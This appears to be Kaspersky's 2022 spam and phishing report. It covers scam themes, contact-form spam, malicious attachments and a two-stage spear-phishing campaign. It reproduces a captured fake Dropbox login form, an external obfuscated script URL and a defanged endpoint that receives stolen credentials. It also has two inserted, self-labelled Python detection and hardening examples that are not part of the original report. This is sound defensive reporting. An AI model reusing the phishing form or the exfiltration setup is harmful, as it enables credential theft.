["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links 
were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. 
Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. The vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. 
For example, one website offered users a COVID vaccination certificate in return for entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. 
By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors a chance to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia's thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were invited to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.\n\n"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered a one-time payment or a fee for taking a service quality survey. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. 
The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. 
In addition to that, they might ask the victim to cover the "shipping costs".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. 
An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)

### Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and those of regional players. An attack often started with the victim receiving a link, by email, in an instant messaging app, or on a social network, to a certain product supposedly offered at an attractive price. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)

"Insider" tips about "private sales" were also used as a lure. For example, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design looked credible, with the only potential red flags being the unrealistically low prices and a URL in the address bar that did not match the official one.

Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing.
The risk associated with making a purchase was losing a substantial amount of money and never receiving what was ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)

### Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but without the other party knowing. Cybercriminals who were after account credentials offered victims a way to have their cake and eat it too, in the form of some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls and track who had been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)

Many Instagram users dream about the Blue Badge, which stands for a verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was enter their account logins and passwords.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)

Russia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant that users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check whether Russian social media contained any embarrassing materials on the victim.
The scam operators told users that damaging information could be found on every third user of a social network by running a search. If the user agreed to have a search done for them, they were told that a certain amount of dirty linen had indeed been found. In reality, there was no search — the scammers simply stole the credentials they had requested for the check.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)

One of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)

Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge, or simply promised to give one away for free, if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)

One more phishing campaign targeting Telegram users was timed to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it.
The cybercriminals were betting on users going straight to voting without checking the authenticity of the drawings, which had been copied from various past years' competition pages, since requests to vote for one's friends' kids are common before public holidays.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)

The Telegram auction platform named Fragment went live in October 2022, selling unique usernames. Users sign in by linking their Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)

## Spam in 2022

### The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of it is "Nigerian-type" scams: millionaires dying from COVID and bequeathing their money to treatment and prevention efforts and to improving the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even without being a Facebook user. Recipients are told that they can claim IMF money left unallocated because of the pandemic.
Others are offered hefty amounts under an anti-recession assistance program.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had fallen threefold by year end.

### Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and that do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name field, and in others, they add a longer text with images to the message field. Then the attackers enter victims' email addresses in the contact fields and submit. When a message arrives via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, that their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)

Most scam messages offer compensation or a prize to the recipient. For example, a spam email targeting Russian users promised the equivalent of $190–4200 in VAT refunds. To get the money, the victim was told to open the link in the message. This scheme is a classic: the linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund.
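The relay abuse described above works only because the site both accepts a link in a name field and echoes what was typed back to an address the submitter chose. The following is an added example of the server-side hardening a site owner would apply; it is not code from the Kaspersky report. The field names, the URL heuristic, the length limit and the two sample submissions are all assumptions, and the scam sample is modelled on the VAT refund lure described above.

```python
"""Hardening a public contact form against being used as a spam relay.

Added example, not code from the Kaspersky report. Field names, the URL
heuristic, the length limit and the sample submissions are all assumptions.
"""
import re
from typing import Optional

# A person's name should never contain a link or a bare domain (assumed heuristic).
URL_RE = re.compile(
    r"(https?://|www\.|\b[a-z0-9-]+\.(?:com|net|org|ru|xyz|fun|top)\b)",
    re.IGNORECASE,
)
NAME_MAX_LEN = 64


def validate_name(name: str) -> bool:
    """Reject empty, over-long or multi-line names and names carrying a link."""
    name = name.strip()
    if not name or len(name) > NAME_MAX_LEN or "\n" in name:
        return False
    return URL_RE.search(name) is None


def build_auto_reply(submission: dict) -> Optional[dict]:
    """Return the acknowledgement to send, or None if the submission is rejected.

    The reply echoes nothing the submitter typed: only fixed text and the ticket
    id assigned by the site. Even if a scam text slipped past validation, it
    could not be relayed to a third party from the site's sender address.
    """
    if not validate_name(submission.get("name", "")):
        return None
    ticket = submission["ticket_id"]  # assigned server-side, never by the submitter
    return {
        "to": submission["email"],
        "subject": f"[Ticket {ticket}] We received your request",
        "body": f"Thank you for contacting us. Your request is registered as ticket {ticket}.",
    }


# Constructed submissions: one genuine, one modelled on the VAT refund lure.
GENUINE = {"name": "Anna Petrova", "email": "anna@example.com",
           "message": "Question about delivery times", "ticket_id": "A1"}
SCAM = {"name": "VAT refund of $4200 approved, claim at http://refund.example/go",
        "email": "victim@example.com", "message": "", "ticket_id": "A2"}

if __name__ == "__main__":
    print(build_auto_reply(GENUINE))
    print(build_auto_reply(SCAM))  # None: rejected before any email is sent
```

The two controls are independent: the name check stops the obvious cases, while the fixed-text acknowledgement removes the relay value of the form even when a lure is phrased so that no heuristic catches it. Sending the acknowledgement only after the submitter has confirmed ownership of the address closes the remaining gap of a stranger's address being entered in the contact field.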
We observed many varieties of the contact form money scam, from fuel cards to offers to make money on some online platform.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" — in fact populated by bots — where the victims would no doubt be asked to pay for a premium account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)

We blocked upward of a million scam emails sent via legitimate forms in 2022.

### Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or received threats in the form of an image with text. In addition, the geography of the mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient for allegedly visiting sites containing child pornography.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)

To avoid serious consequences, the attackers urged the victim to respond to the sender as soon as possible and "settle the matter". Most likely, in further correspondence the scammers would ask for a certain amount of money to be paid for the victim's name to be removed from the "criminal case".
In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

### Exploiting the news

Spammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing money transfers, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand transfers to Bitcoin wallets, as it is more difficult to trace the recipient of a cryptocurrency transaction than of a bank transfer. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)

The news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails in which fraudsters were requesting help on behalf of a Russian millionaire who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky enough to get a piece of this pie.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)

More and more "business offers" are appearing among spam mailings, and they exploit the current news agenda. Due to the economic sanctions of 2022, enterprising businessmen offered replacements for goods and services from suppliers who had left the Russian market. For example, spammers actively advertised the services of a company transporting people to Russia.
The email text emphasized the fact that many transport companies refused to provide such services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)

There were also spam mailings in which various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)

Spammers in 2022 also actively marketed their promotional mailing services as an alternative to advertising on platforms that had become unavailable, such as Instagram. For example, in April we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there was an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and their number was growing, from around 700,000 in the first quarter to more than a million in the fourth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)

### Spam with malicious attachments

Employees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted.
Attackers have become more active in imitating business correspondence, targeting not only HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and using business language. They also actively exploited the current news agenda and mentioned real employees of the company supposedly sending the emails. Spammers disguised their messages as internal company correspondence, business correspondence between different organizations, and even notifications from government agencies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)

Masking malicious emails as business correspondence became a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing it from previously infected computers) and sent malicious files or links to all of its participants in reply to the previous email. This trick makes malicious emails harder to spot, and the victim is more likely to fall for it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)

In most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened.
Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot can also be used to access mailboxes and steal emails for use in further attacks.

Mailings imitating notifications from various ministries and other government organizations became more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be from. The sender addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda. In particular, malware was distributed under the guise of a call-up "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".

In the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.

## Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (or targeted) phishing attacks on businesses around the world. In addition to typical campaigns consisting of a single stage, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services.
After the victim responds to this email, the attackers start the phishing attack.

Key facts:

 * Attackers use fake Dropbox pages created using a well-known phishing kit
 * The campaign targets the sales departments of manufacturers and suppliers of goods and services
 * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)

### Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_

### How a phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address in a free domain, like gmail.com, may raise doubts. The email in the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different from its name in the signature.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)

**_Example of the first email_**

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are quick to block email addresses spotted sending spam.
This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and the _Reply-To_ header (where the reply goes when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-To_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.

After victims respond to the first email, attackers send a new message asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)

**_An email with a phishing link_**

By clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials for specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)

**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button.
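Two traits of this campaign lend themselves to mechanical checks on the receiving side: the first-stage email's free-mail sender with a _Reply-To_ that diverts the conversation to a different domain, and the landing page's credential form that has no `action` attribute and relies on an externally loaded script (the form HTML is reproduced further below in this section). The following is an added example of both checks, not code from the Kaspersky report or from the phishing kit. The sample email, the free-mail domain list and the sample page are constructed; the page's form structure mirrors the captured form, but the script path is a shortened placeholder.

```python
"""Detection heuristics for the two-stage campaign described in this section.

Added example, not code from the Kaspersky report. The sample email, the
free-mail domain list and the sample page are constructed for illustration.
"""
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Webmail domains that rarely appear in genuine B2B correspondence (assumed list).
FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}


def _domain(header_value) -> str:
    """Lower-cased domain part of an address header, '' if the header is absent."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def check_headers(raw_message: str) -> list:
    """Flag a free-mail sender and a Reply-To that points to another domain."""
    msg = message_from_string(raw_message)
    from_dom = _domain(msg.get("From"))
    reply_dom = _domain(msg.get("Reply-To"))
    findings = []
    if from_dom in FREE_MAIL_DOMAINS:
        findings.append(f"sender uses free mail domain {from_dom}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    return findings


class _FormScanner(HTMLParser):
    """Collect the action of every form holding a password field, plus script hosts."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.form_action = None
        self.password_forms = []   # one entry per password input: the form's action
        self.script_hosts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.in_form, self.form_action = True, a.get("action")
        elif tag == "input" and self.in_form and a.get("type") == "password":
            self.password_forms.append(self.form_action)
        elif tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host:
                self.script_hosts.add(host.lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False


def check_login_page(html: str, page_host: str) -> list:
    """Flag credential forms submitted by script or to another host, and foreign scripts."""
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    for action in scanner.password_forms:
        target = urlparse(action).hostname if action else None
        if action is None:
            findings.append("password form has no action: submission handled by script")
        elif target and target.lower() != page_host.lower():
            findings.append(f"password form posts to external host {target}")
    for host in sorted(scanner.script_hosts):
        if host != page_host.lower():
            findings.append(f"script loaded from external host {host}")
    return findings


# Constructed first-stage email showing the header traits described above.
SAMPLE_EMAIL = """From: Acme Trading <purchasing.acme@gmail.com>
Reply-To: <acme.orders@outlook.com>
To: sales@example.com
Subject: Request for quotation

Please send your current price list.
"""

# Constructed page: same form shape as the captured one, placeholder script path.
SAMPLE_PAGE = """<form name="loginform">
 <input type="email" name="email">
 <input type="password" name="password">
 <button type="submit">Download</button>
</form>
<script src="https://firebasestorage.googleapis.com/v0/b/placeholder/o/obfuscated.js"></script>
"""

if __name__ == "__main__":
    for line in check_headers(SAMPLE_EMAIL) + check_login_page(SAMPLE_PAGE, "phish.example"):
        print(line)
```

Neither check is proof on its own: genuine small businesses do write from Gmail, and many legitimate pages submit forms from script. The combination seen here, a diverted reply address in the first message followed by a password form with no action on a page whose only script comes from a third-party host, is what makes the sequence worth a block or an analyst's look.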
After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)

**_A fake Dropbox page_**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)

**_Login page with a phishing form_**

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.

```html
<!-- Captured fragment. Note that the form has no action attribute: the
     externally loaded script handles submission to the address named above. -->
<form name="loginform">
  <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
  </div>
  <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
  </div>
  <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
  </div>
</form>
</div>
<script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>
```

**_HTML representation of a phishing form_**

### Victims

We have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

## Statistics: spam

### Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021.
Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest: only 45.20% of emails in that month were spam.

On Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend of a gradual shift in the ratio in favor of legitimate correspondence can also be seen there. We saw the largest share of spam in Runet in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

